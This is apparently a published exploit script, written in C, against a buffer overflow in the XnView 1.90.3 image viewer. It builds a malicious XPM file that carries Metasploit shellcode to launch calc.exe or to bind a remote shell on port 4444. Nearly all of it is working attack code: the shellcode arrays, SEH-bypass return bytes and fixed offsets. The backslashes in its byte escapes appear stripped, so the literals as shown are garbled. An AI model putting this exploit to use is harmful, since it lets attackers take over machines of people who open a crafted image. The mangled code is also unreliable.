# Title : XnView 1.90.3 (.XPM File) Local Buffer Overflow Exploit
# Published : 2007-04-22
# Author : Marsu
/*****************************************************************************
* *
* XnView 1.90.3 .XPM File Buffer Overflow *
* *
* *
* XnView is vulnerable to a buffer overflow while processing a crafted XPM *
* file. It fails to check the length of the entries of the declared pixmap *
* array, which leads to code execution. *
* This exploit runs calc.exe or binds a shell to port 4444. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr> *
*****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
/* Payload for mode 0: the Metasploit-generated win32_exec stub described in
 * the comment above (launches calc.exe). main() copies it into the file
 * with strlen(), so the literal is treated as a NUL-terminated string. */
unsigned char CalcShellcode[] =
"x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x98"
"x11xbexa7x83xebxfcxe2xf4x64xf9xfaxa7x98x11x35xe2"
"xa4x9axc2xa2xe0x10x51x2cxd7x09x35xf8xb8x10x55xee"
"x13x25x35xa6x76x20x7ex3ex34x95x7exd3x9fxd0x74xaa"
"x99xd3x55x53xa3x45x9axa3xedxf4x35xf8xbcx10x55xc1"
"x13x1dxf5x2cxc7x0dxbfx4cx13x0dx35xa6x73x98xe2x83"
"x9cxd2x8fx67xfcx9axfex97x1dxd1xc6xabx13x51xb2x2c"
"xe8x0dx13x2cxf0x19x55xaex13x91x0exa7x98x11x35xcf"
"xa4x4ex8fx51xf8x47x37x5fx1bxd1xc5xf7xf0x6fx66x45"
"xebx79x26x59x12x1fxe9x58x7fx72xdfxcbxfbx3fxdbxdf"
"xfdx11xbexa7";
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
/* Payload for mode 1: the Metasploit-generated win32_bind stub described in
 * the comment above (listens on TCP 4444). Like CalcShellcode it is copied
 * by main() with strlen(), i.e. as a NUL-terminated string. From a
 * detection standpoint, a viewer process opening a listening socket after
 * loading an image file is the observable effect of this variant. */
unsigned char BindShellcode[] =
"x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x5c"
"x7bx78x7fx83xebxfcxe2xf4xa0x11x93x32xb4x82x87x80"
"xa3x1bxf3x13x78x5fxf3x3ax60xf0x04x7ax24x7ax97xf4"
"x13x63xf3x20x7cx7ax93x36xd7x4fxf3x7exb2x4axb8xe6"
"xf0xffxb8x0bx5bxbaxb2x72x5dxb9x93x8bx67x2fx5cx57"
"x29x9exf3x20x78x7ax93x19xd7x77x33xf4x03x67x79x94"
"x5fx57xf3xf6x30x5fx64x1ex9fx4axa3x1bxd7x38x48xf4"
"x1cx77xf3x0fx40xd6xf3x3fx54x25x10xf1x12x75x94x2f"
"xa3xadx1ex2cx3ax13x4bx4dx34x0cx0bx4dx03x2fx87xaf"
"x34xb0x95x83x67x2bx87xa9x03xf2x9dx19xddx96x70x7d"
"x09x11x7ax80x8cx13xa1x76xa9xd6x2fx80x8ax28x2bx2c"
"x0fx28x3bx2cx1fx28x87xafx3ax13x69x23x3ax28xf1x9e"
"xc9x13xdcx65x2cxbcx2fx80x8ax11x68x2ex09x84xa8x17"
"xf8xd6x56x96x0bx84xaex2cx09x84xa8x17xb9x32xfex36"
"x0bx84xaex2fx08x2fx2dx80x8cxe8x10x98x25xbdx01x28"
"xa3xadx2dx80x8cx1dx12x1bx3ax13x1bx12xd5x9ex12x2f"
"x05x52xb4xf6xbbx11x3cxf6xbex4axb8x8cxf6x85x3ax52"
"xa2x39x54xecxd1x01x40xd4xf7xd0x10x0dxa2xc8x6ex80"
"x29x3fx87xa9x07x2cx2ax2ex0dx2ax12x7ex0dx2ax2dx2e"
"xa3xabx10xd2x85x7exb6x2cxa3xadx12x80xa3x4cx87xaf"
"xd7x2cx84xfcx98x1fx87xa9x0ex84xa8x17xacxf1x7cx20"
"x0fx84xaex80x8cx7bx78x7f";
/* Minimal XPM prologue, written at offset 0 of the 'A'-filled file image by
 * main(). Read as bytes, the hex values spell the XPM magic comment, the
 * declaration `static char *Pixmap[] = {`, the values line "509 438 256 3"
 * (width, height, colours, chars per pixel) and the opening quote of the
 * next array entry. Everything from there up to the trailer main() places
 * at 0x1916 is that single entry: roughly 6.3 KB of filler, far longer than
 * any field the declared geometry implies. A parser that bounds each entry
 * by the declared width * chars-per-pixel — or a file scanner applying the
 * same check — rejects the file on that inconsistency alone. */
char XPMHeaders[]=
"x2fx2ax20x58x50x4dx20x2ax2fx0dx0ax73x74x61x74x69"
"x63x20x63x68x61x72x20x2ax50x69x78x6dx61x70x5bx5d"
"x20x3dx20x7bx0dx0ax22x35x30x39x20x34x33x38x20x32"
"x35x36x20x33x22x2cx0dx0ax22";
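/*
 * Entry point of the file generator.
 *
 * argv[1] selects the payload placed in the file: 0 chooses CalcShellcode,
 * any other value chooses BindShellcode (the usage text calls these modes
 * 0 and 1). argv[2] is the path of the .xpm file to write.
 *
 * Returns 0 only when the whole image was written and the stream closed
 * cleanly; 1 on a usage error, a payload that would not fit the buffer, a
 * failed fopen(), a short fwrite() or a failed fclose(). Previously every
 * path returned 0, so a caller could not tell a failed write from success.
 *
 * All literals, offsets and byte counts are kept exactly as given; only
 * bounds checking, error reporting and resource handling are tightened.
 */
int main(int argc, char *argv[])
{
    /* Whole file image. It is pre-filled with 'A' so every gap between the
     * pieces placed below is filler. */
    char evilbuff[6600];
    const size_t total = sizeof evilbuff;

    printf("[+] XnView 1.90.3 .XPM File Buffer Overflown");
    printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>n");
    if (argc != 3) {
        printf("[+] Usage: %s Mode <file.xpm>n", argv[0]);
        printf("[+] Mode is 0 -> run calc.exen");
        printf("[+] 1 -> bind shell to port 4444n");
        return 1;
    }

    memset(evilbuff, 'A', total);

    /* XPM prologue first; sizeof - 1 leaves out the literal's terminating NUL. */
    memcpy(evilbuff, XPMHeaders, sizeof(XPMHeaders) - 1);

    /* Return address depends on the way the document is opened:
     * jmp over EIP + pop pop ret in ??? to defeat SEH protection + jmp back
     * to the shellcode. Three copies because the file can be reached through
     * several code paths. */
    memcpy(evilbuff + 0xead, "x90x90xebx05x2ax02xfcx7fx41xe9x8axf1xffxff", 14);
    memcpy(evilbuff + 0x1299, "x90x90xebx05x2ax02xfcx7fx41xe9x9exedxffxff", 14);
    memcpy(evilbuff + 0x1799, "x90x90xebx05x2ax02xfcx7fx41xe9x9exe8xffxff", 14);

    /* Payload selection. strlen() measures up to the first NUL; the cast only
     * resolves the unsigned char* / char* mismatch. The copy was previously
     * unchecked, so guard it: a payload longer than the remaining buffer must
     * never overrun evilbuff. */
    const unsigned char *payload = atoi(argv[1]) ? BindShellcode : CalcShellcode;
    const size_t payload_off = sizeof(XPMHeaders) + 0x10;
    const size_t payload_len = strlen((const char *)payload);
    if (payload_len > total - payload_off) {
        printf("[-] Payload does not fit in the file buffer.\n");
        return 1;
    }
    memcpy(evilbuff + payload_off, payload, payload_len);

    /* End-of-file trailer. */
    memcpy(evilbuff + 0x1916, "x22x0dx0ax29x3bx0dx0a", 7);

    FILE *xpmfile = fopen(argv[2], "wb");
    if (xpmfile == NULL) {
        printf("[-] Unable to access file.n");
        return 1;
    }

    /* fwrite() may write fewer bytes than requested and fclose() is what
     * flushes the stream, so both results decide the exit status. */
    int rc = 0;
    if (fwrite(evilbuff, 1, total, xpmfile) != total) {
        printf("[-] Short write to file.\n");
        rc = 1;
    }
    if (fclose(xpmfile) != 0) {
        printf("[-] Error closing file.\n");
        rc = 1;
    }
    if (rc == 0) {
        printf("[+] Done. Have fun!n");
    }
    return rc;
}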